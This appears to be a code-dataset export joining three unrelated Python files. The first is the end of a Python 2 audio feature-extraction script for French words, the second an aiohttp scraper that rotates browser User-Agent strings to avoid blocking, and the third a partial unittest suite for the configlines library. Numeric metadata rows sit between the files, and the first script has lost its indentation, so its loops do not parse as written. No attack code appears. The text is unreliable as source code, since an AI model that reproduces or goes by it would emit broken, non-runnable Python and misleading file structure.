for i in range(1,8):
XJ_du_1_total = XJ_1[(t_start+t_entre_step*(i)-1):(t_start+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_3[24*i+j]=x1_all[j]
#==============================================================================
# this part is to calcul the 4 matrix
#==============================================================================
for k in range (1,2):
t_start=t_du_4_1
XJ_du_1_2 = XJ_1[(t_start-1):(t_start+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_4 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_4[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
# print i
XJ_du_1_total = XJ_1[(t_start+t_entre_step*(i)-1):(t_start+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_4[24*i+j]=x1_all[j]
#==============================================================================
# this part is to calcul the 5 matrix
#==============================================================================
for k in range (1,2):
t_start=t_du_5_1
XJ_du_1_2 = XJ_1[(t_start-1):(t_start+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_5 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_5[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
# print i
XJ_du_1_total = XJ_1[(t_start+t_entre_step*(i)-1):(t_start+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_5[24*i+j]=x1_all[j]
le_1 = matrix_all_step_new_1
le_2 = matrix_all_step_new_2
le_3 = matrix_all_step_new_3
le_4 = matrix_all_step_new_4
le_5 = matrix_all_step_new_5
#==============================================================================
# # this is the parti for the 'le' end
#==============================================================================
#==============================================================================
# this is the parti for the 'qui' start
#==============================================================================
wave_signal_float,framerate, word_start_point, word_length_point, word_end_point= read_wav_xml_good_1(filename,filename_1,word_3)
XJ_1 =wave_signal_float
t_step=1920;
t_entre_step=1440;
t_du_1_1 = int(word_start_point[0]);
t_du_1_2 = int(word_end_point[0]);
t_du_2_1 = int(word_start_point[1]);
t_du_2_2 = int(word_end_point[1]);
t_du_3_1 = int(word_start_point[2]);
t_du_3_2 = int(word_end_point[2]);
t_du_4_1 = int(word_start_point[3]);
t_du_4_2 = int(word_end_point[3]);
t_du_5_1 = int(word_start_point[4]);
t_du_5_2 = int(word_end_point[4]);
fs=framerate
#XJ_du_1 = wave_signal_float[(t_du_1_1-1):t_du_1_2];
#length_XJ_du_1 = int(word_length_point[0]+1);
#x1,y1,z1=matrix_24_2(XJ_du_1,fs)
#x1=max_matrix_norm(x1)
#==============================================================================
# this part is to calcul the first matrix
#==============================================================================
XJ_du_1_2 = XJ_1[(t_du_1_1-1):(t_du_1_1+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_1 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_1[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
XJ_du_1_total = XJ_1[(t_du_1_1+t_entre_step*(i)-1):(t_du_1_1+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_1[24*i+j]=x1_all[j]
#==============================================================================
# this part is to calcul the second matrix
#==============================================================================
for k in range (1,2):
t_start=t_du_2_1
XJ_du_1_2 = XJ_1[(t_start-1):(t_start+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_2 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_2[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
XJ_du_1_total = XJ_1[(t_start+t_entre_step*(i)-1):(t_start+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_2[24*i+j]=x1_all[j]
#==============================================================================
# this part is to calcul the 3 matrix
#==============================================================================
for k in range (1,2):
t_start=t_du_3_1
XJ_du_1_2 = XJ_1[(t_start-1):(t_start+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_3 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_3[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
XJ_du_1_total = XJ_1[(t_start+t_entre_step*(i)-1):(t_start+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_3[24*i+j]=x1_all[j]
#==============================================================================
# this part is to calcul the 4 matrix
#==============================================================================
for k in range (1,2):
t_start=t_du_4_1
XJ_du_1_2 = XJ_1[(t_start-1):(t_start+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_4 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_4[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
# print i
XJ_du_1_total = XJ_1[(t_start+t_entre_step*(i)-1):(t_start+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_4[24*i+j]=x1_all[j]
#==============================================================================
# this part is to calcul the 5 matrix
#==============================================================================
for k in range (1,2):
t_start=t_du_5_1
XJ_du_1_2 = XJ_1[(t_start-1):(t_start+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_5 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_5[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
# print i
XJ_du_1_total = XJ_1[(t_start+t_entre_step*(i)-1):(t_start+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_5[24*i+j]=x1_all[j]
qui_1 = matrix_all_step_new_1
qui_2 = matrix_all_step_new_2
qui_3 = matrix_all_step_new_3
qui_4 = matrix_all_step_new_4
qui_5 = matrix_all_step_new_5
#==============================================================================
# this is the parti for the 'dans' start
#==============================================================================
wave_signal_float,framerate, word_start_point, word_length_point, word_end_point= read_wav_xml_good_1(filename,filename_1,word_4)
XJ_1 =wave_signal_float
t_step=1920;
t_entre_step=1440;
t_du_1_1 = int(word_start_point[0]);
t_du_1_2 = int(word_end_point[0]);
t_du_2_1 = int(word_start_point[1]);
t_du_2_2 = int(word_end_point[1]);
t_du_3_1 = int(word_start_point[2]);
t_du_3_2 = int(word_end_point[2]);
t_du_4_1 = int(word_start_point[3]);
t_du_4_2 = int(word_end_point[3]);
t_du_5_1 = int(word_start_point[4]);
t_du_5_2 = int(word_end_point[4]);
fs=framerate
#XJ_du_1 = wave_signal_float[(t_du_1_1-1):t_du_1_2];
#length_XJ_du_1 = int(word_length_point[0]+1);
#x1,y1,z1=matrix_24_2(XJ_du_1,fs)
#x1=max_matrix_norm(x1)
#==============================================================================
# this part is to calcul the first matrix
#==============================================================================
XJ_du_1_2 = XJ_1[(t_du_1_1-1):(t_du_1_1+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_1 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_1[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
XJ_du_1_total = XJ_1[(t_du_1_1+t_entre_step*(i)-1):(t_du_1_1+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_1[24*i+j]=x1_all[j]
#==============================================================================
# this part is to calcul the second matrix
#==============================================================================
for k in range (1,2):
t_start=t_du_2_1
XJ_du_1_2 = XJ_1[(t_start-1):(t_start+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_2 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_2[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
XJ_du_1_total = XJ_1[(t_start+t_entre_step*(i)-1):(t_start+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_2[24*i+j]=x1_all[j]
#==============================================================================
# this part is to calcul the 3 matrix
#==============================================================================
for k in range (1,2):
t_start=t_du_3_1
XJ_du_1_2 = XJ_1[(t_start-1):(t_start+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_3 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_3[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
XJ_du_1_total = XJ_1[(t_start+t_entre_step*(i)-1):(t_start+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_3[24*i+j]=x1_all[j]
#==============================================================================
# this part is to calcul the 4 matrix
#==============================================================================
for k in range (1,2):
t_start=t_du_4_1
XJ_du_1_2 = XJ_1[(t_start-1):(t_start+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_4 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_4[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
# print i
XJ_du_1_total = XJ_1[(t_start+t_entre_step*(i)-1):(t_start+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_4[24*i+j]=x1_all[j]
#==============================================================================
# this part is to calcul the 5 matrix
#==============================================================================
for k in range (1,2):
t_start=t_du_5_1
XJ_du_1_2 = XJ_1[(t_start-1):(t_start+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_5 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_5[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
# print i
XJ_du_1_total = XJ_1[(t_start+t_entre_step*(i)-1):(t_start+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_5[24*i+j]=x1_all[j]
dans_1 = matrix_all_step_new_1
dans_2 = matrix_all_step_new_2
dans_3 = matrix_all_step_new_3
dans_4 = matrix_all_step_new_4
dans_5 = matrix_all_step_new_5
#==============================================================================
# this is the parti for the 'de' start
#==============================================================================
wave_signal_float,framerate, word_start_point, word_length_point, word_end_point= read_wav_xml_good_1(filename,filename_1,word_5)
XJ_1 =wave_signal_float
t_step=1920;
t_entre_step=1440;
t_du_1_1 = int(word_start_point[0]);
t_du_1_2 = int(word_end_point[0]);
t_du_2_1 = int(word_start_point[1]);
t_du_2_2 = int(word_end_point[1]);
t_du_3_1 = int(word_start_point[2]);
t_du_3_2 = int(word_end_point[2]);
t_du_4_1 = int(word_start_point[3]);
t_du_4_2 = int(word_end_point[3]);
t_du_5_1 = int(word_start_point[4]);
t_du_5_2 = int(word_end_point[4]);
fs=framerate
#XJ_du_1 = wave_signal_float[(t_du_1_1-1):t_du_1_2];
#length_XJ_du_1 = int(word_length_point[0]+1);
#x1,y1,z1=matrix_24_2(XJ_du_1,fs)
#x1=max_matrix_norm(x1)
#==============================================================================
# this part is to calcul the first matrix
#==============================================================================
XJ_du_1_2 = XJ_1[(t_du_1_1-1):(t_du_1_1+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_1 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_1[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
XJ_du_1_total = XJ_1[(t_du_1_1+t_entre_step*(i)-1):(t_du_1_1+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_1[24*i+j]=x1_all[j]
#==============================================================================
# this part is to calcul the second matrix
#==============================================================================
for k in range (1,2):
t_start=t_du_2_1
XJ_du_1_2 = XJ_1[(t_start-1):(t_start+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_2 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_2[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
XJ_du_1_total = XJ_1[(t_start+t_entre_step*(i)-1):(t_start+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_2[24*i+j]=x1_all[j]
#==============================================================================
# this part is to calcul the 3 matrix
#==============================================================================
for k in range (1,2):
t_start=t_du_3_1
XJ_du_1_2 = XJ_1[(t_start-1):(t_start+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_3 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_3[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
XJ_du_1_total = XJ_1[(t_start+t_entre_step*(i)-1):(t_start+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_3[24*i+j]=x1_all[j]
#==============================================================================
# this part is to calcul the 4 matrix
#==============================================================================
for k in range (1,2):
t_start=t_du_4_1
XJ_du_1_2 = XJ_1[(t_start-1):(t_start+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_4 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_4[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
# print i
XJ_du_1_total = XJ_1[(t_start+t_entre_step*(i)-1):(t_start+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_4[24*i+j]=x1_all[j]
#==============================================================================
# this part is to calcul the 5 matrix
#==============================================================================
for k in range (1,2):
t_start=t_du_5_1
XJ_du_1_2 = XJ_1[(t_start-1):(t_start+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_5 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_5[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
# print i
XJ_du_1_total = XJ_1[(t_start+t_entre_step*(i)-1):(t_start+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_5[24*i+j]=x1_all[j]
de_1 = matrix_all_step_new_1
de_2 = matrix_all_step_new_2
de_3 = matrix_all_step_new_3
de_4 = matrix_all_step_new_4
de_5 = matrix_all_step_new_5
print 'finish_part_1'
#==============================================================================
# # this is the parti for the 'le' end
#==============================================================================
np.savez('je_le_qui_dans_de_192_matrix.npz',je_1,je_2,je_3,je_4,je_5,le_1,le_2,le_3,le_4,le_5,qui_1,qui_2,qui_3,qui_4,qui_5,dans_1,dans_2,dans_3,dans_4,dans_5,de_1,de_2,de_3,de_4,de_5)
| 44.663793
| 184
| 0.491958
| 4,978
| 31,086
| 2.634793
| 0.019888
| 0.035453
| 0.04384
| 0.128088
| 0.962794
| 0.957838
| 0.926121
| 0.924291
| 0.922385
| 0.922385
| 0
| 0.065991
| 0.124011
| 31,086
| 696
| 184
| 44.663793
| 0.415666
| 0.397928
| 0
| 0.905077
| 0
| 0
| 0.005857
| 0.004447
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.00883
| null | null | 0.002208
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
d40cf0a6971b1d4e07c7769350f3a812613bab4b
| 3,895
|
py
|
Python
|
ctft/souper.py
|
bajatin/ctft
|
71e5e42f42d0910b310331c4d19a38ccf0745870
|
[
"MIT"
] | 5
|
2020-08-14T13:20:57.000Z
|
2022-01-09T00:44:22.000Z
|
ctft/souper.py
|
bajatin/ctft
|
71e5e42f42d0910b310331c4d19a38ccf0745870
|
[
"MIT"
] | null | null | null |
ctft/souper.py
|
bajatin/ctft
|
71e5e42f42d0910b310331c4d19a38ccf0745870
|
[
"MIT"
] | null | null | null |
import random
import requests
import aiohttp
import asyncio
from bs4 import BeautifulSoup
# Pool of desktop-browser User-Agent strings (Firefox and Chrome releases,
# circa 2014-2015).  One entry is drawn at random below so the scraper does
# not present a constant, easily-blocked fingerprint.
user_agent_list = [
    'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1',
    'Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0',
    'Mozilla/5.0 (X11; Linux i586; rv:31.0) Gecko/20100101 Firefox/31.0',
    'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20130401 Firefox/31.0',
    'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
    'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',
    'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/29.0',
    'Mozilla/5.0 (X11; OpenBSD amd64; rv:28.0) Gecko/20100101 Firefox/28.0',
    'Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0',
    'Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3',
    'Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:27.0) Gecko/20121011 Firefox/27.0',
    'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36',
    'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36',
    'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36',
    'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36',
    'Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36',
    'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36',
    'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36',
    'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36',
    'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
    'Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
    'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
    'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
    'Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36',
    'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36',
    'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36',
    'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36',
]
# The agent is chosen once at import time, so every request made by this
# process shares one identity (not re-randomized per request).
user_agent = random.choice(user_agent_list)
header = {'User-Agent':user_agent}
async def souper(url,session=None):
    """Fetch *url* and return the response body parsed with BeautifulSoup.

    Requests are sent with the module-level random ``header`` user agent and
    ``raise_for_status=True``, so HTTP errors raise ``aiohttp.ClientResponseError``.

    :param url: URL to GET.
    :param session: optional ``aiohttp.ClientSession`` to reuse; when omitted
        (falsy) a temporary session with a 5-connection ``TCPConnector`` is
        created and closed around the single request.
    :return: ``BeautifulSoup`` document parsed with ``'html.parser'``.
    """
    async def _fetch(sess):
        # Shared request/parse path for both the owned and borrowed session.
        async with sess.get(url, headers=header, raise_for_status=True) as response:
            html = await response.text()
            return BeautifulSoup(html, 'html.parser')

    if session:
        return await _fetch(session)
    # Only build the connector when we actually own the session; the original
    # created it unconditionally, leaking an unused TCPConnector whenever a
    # caller supplied its own session.
    connector = aiohttp.TCPConnector(limit=5)
    async with aiohttp.ClientSession(connector=connector) as session:
        return await _fetch(session)
| 66.016949
| 128
| 0.689602
| 700
| 3,895
| 3.81
| 0.161429
| 0.071241
| 0.104612
| 0.131984
| 0.781027
| 0.774653
| 0.750281
| 0.709786
| 0.667042
| 0.64117
| 0
| 0.214134
| 0.15353
| 3,895
| 58
| 129
| 67.155172
| 0.594783
| 0
| 0
| 0.117647
| 0
| 0.607843
| 0.748074
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.098039
| 0
| 0.137255
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
00faa9f8df630a887ca74689348c7c8bf3549ee7
| 12,427
|
py
|
Python
|
configlines/tests/test_parsers.py
|
benfogle/configlines
|
7167593d73218b073a822d7ed7b1140587847c6b
|
[
"MIT"
] | 1
|
2018-05-06T20:09:54.000Z
|
2018-05-06T20:09:54.000Z
|
configlines/tests/test_parsers.py
|
benfogle/configlines
|
7167593d73218b073a822d7ed7b1140587847c6b
|
[
"MIT"
] | null | null | null |
configlines/tests/test_parsers.py
|
benfogle/configlines
|
7167593d73218b073a822d7ed7b1140587847c6b
|
[
"MIT"
] | null | null | null |
from unittest import TestCase
import sys
import six
from six.moves import configparser
from pkg_resources import resource_filename
import configlines
class ConfigTest(TestCase):
def test_simple(self):
cfg = configlines.ConfigParser()
path = resource_filename(__name__, 'data1.cfg')
cfg.read(path)
self.assertEqual(cfg.get('foo', 'bar'), '1')
self.assertEqual(cfg.get_location('foo', 'bar'), (path, 2))
self.assertEqual(cfg.get_location('foo', 'BAR'), (path, 2))
self.assertEqual(cfg.get_filename('foo', 'bar'), path)
self.assertEqual(cfg.get_line('foo', 'bar'), 2)
self.assertEqual(cfg.get('foo', 'baz'), '2')
self.assertEqual(cfg.get_location('foo', 'baz'), (path, 3))
self.assertEqual(cfg.get_filename('foo', 'baz'), path)
self.assertEqual(cfg.get_line('foo', 'baz'), 3)
self.assertEqual(cfg.get('qwerty', 'abc'), 'a split\nline')
self.assertEqual(cfg.get_location('qwerty', 'abc'), (path, 11))
self.assertEqual(cfg.get_filename('qwerty', 'abc'), path)
self.assertEqual(cfg.get_line('qwerty', 'abc'), 11)
def test_reassign(self):
cfg = configlines.ConfigParser()
path = resource_filename(__name__, 'data1.cfg')
cfg.read(path)
self.assertEqual(cfg.get('foo', 'bar'), '1')
self.assertEqual(cfg.get_location('foo', 'bar'), (path, 2))
self.assertEqual(cfg.get_filename('foo', 'bar'), path)
self.assertEqual(cfg.get_line('foo', 'bar'), 2)
cfg.set('foo', 'bar', 'q')
self.assertEqual(cfg.get('foo', 'bar'), 'q')
self.assertIsNone(cfg.get_location('foo', 'bar'))
self.assertIsNone(cfg.get_filename('foo', 'bar'))
self.assertIsNone(cfg.get_line('foo', 'bar'))
if sys.hexversion >= 0x03020000:
cfg['foo']['baz'] = 'q'
self.assertEqual(cfg.get('foo', 'baz'), 'q')
self.assertIsNone(cfg.get_location('foo', 'baz'))
self.assertIsNone(cfg.get_filename('foo', 'baz'))
self.assertIsNone(cfg.get_line('foo', 'baz'))
cfg.read_dict({'qwerty':{'abc':'a', 'def':'b'}})
self.assertEqual(cfg.get('qwerty', 'abc'), 'a')
self.assertIsNone(cfg.get_location('qwerty', 'abc'))
self.assertIsNone(cfg.get_filename('qwerty', 'abc'))
self.assertIsNone(cfg.get_line('qwerty', 'abc'))
self.assertEqual(cfg.get('qwerty', 'def'), 'b')
self.assertIsNone(cfg.get_location('qwerty', 'def'))
self.assertIsNone(cfg.get_filename('qwerty', 'def'))
self.assertIsNone(cfg.get_line('qwerty', 'def'))
def test_defaults(self):
cfg = configlines.ConfigParser()
path = resource_filename(__name__, 'data2.cfg')
cfg.read(path)
self.assertEqual(cfg.get('sectA', 'foo'), '1')
self.assertEqual(cfg.get_location('sectA', 'foo'), (path, 2))
self.assertEqual(cfg.get_filename('sectA', 'foo'), path)
self.assertEqual(cfg.get_line('sectA', 'foo'), 2)
self.assertEqual(cfg.get('sectA', 'bar'), 'B')
self.assertEqual(cfg.get_location('sectA', 'bar'), (path, 9))
self.assertEqual(cfg.get_filename('sectA', 'bar'), path)
self.assertEqual(cfg.get_line('sectA', 'bar'), 9)
self.assertEqual(cfg.get('sectB', 'foo'), 'A')
self.assertEqual(cfg.get_location('sectB', 'foo'), (path, 8))
self.assertEqual(cfg.get_filename('sectB', 'foo'), path)
self.assertEqual(cfg.get_line('sectB', 'foo'), 8)
self.assertEqual(cfg.get('sectB', 'bar'), '2')
self.assertEqual(cfg.get_location('sectB', 'bar'), (path, 5))
self.assertEqual(cfg.get_filename('sectB', 'bar'), path)
self.assertEqual(cfg.get_line('sectB', 'bar'), 5)
def test_multiple_files(self):
cfg = configlines.ConfigParser()
path1 = resource_filename(__name__, 'data2.cfg')
path2 = resource_filename(__name__, 'data3.cfg')
cfg.read([path1, path2])
self.assertEqual(cfg.get('sectA', 'foo'), '1')
self.assertEqual(cfg.get_location('sectA', 'foo'), (path1, 2))
self.assertEqual(cfg.get_filename('sectA', 'foo'), path1)
self.assertEqual(cfg.get_line('sectA', 'foo'), 2)
self.assertEqual(cfg.get('sectA', 'bar'), 'B')
self.assertEqual(cfg.get_location('sectA', 'bar'), (path1, 9))
self.assertEqual(cfg.get_filename('sectA', 'bar'), path1)
self.assertEqual(cfg.get_line('sectA', 'bar'), 9)
self.assertEqual(cfg.get('sectA', 'baz'), '3')
self.assertEqual(cfg.get_location('sectA', 'baz'), (path2, 2))
self.assertEqual(cfg.get_filename('sectA', 'baz'), path2)
